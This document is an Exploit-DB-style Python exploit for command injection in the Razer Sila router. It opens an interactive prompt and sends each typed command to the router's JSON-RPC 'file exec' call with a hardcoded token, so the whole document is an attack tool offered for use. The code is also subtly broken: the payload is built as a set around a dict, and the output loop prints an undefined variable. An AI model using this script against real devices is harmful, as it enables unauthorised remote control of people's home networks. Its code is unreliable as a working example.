# Exploit Title: Razer Sila - Command Injection (py) # Google Dork: N/A # Date: 2022-04-22 # Exploit Author: Mohsen Dehghani (aka 0xProfessional) # Contact: 0xProfessional@protonmail.com # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A import requests import sys import json target = sys.argv[1] h = { 'Host': target, 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': '*/*', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Content-Length': '117', 'Origin': target, 'Referer': target, 'Te': 'trailers', 'Connection': 'close' } def usage(): print("Razer Sila - Command Injection ") print("Coded by Mohsen Dehghani [aka 0xProfessional]") print("Contact to me: 0xProfessional@protonmail.com") print("Ex: python3 Exploit.py 127.0.0.1") # Data Json def main(url): while(1): try: cmd = input("$") dataJson = { {"jsonrpc":"2.0","id":3, "method":"call", "params":["30ebdc7dd1f519beb4b2175e9dd8463e", "file", "exec", {"command":cmd}]}} if cmd == 'quit' or cmd == 'exit': break req = requests.post(url,headers=h,data=dataJson) if req.status_code == 200: for jsonData in req.content: print(i['stdout']) else: print("Router Not Vulnerable :(") break except: print("Error:(") try: if len(sys.argv) == 2: main(sys.argv[1]) else: usage() except KeyboardInterrupt as e: sys.exit()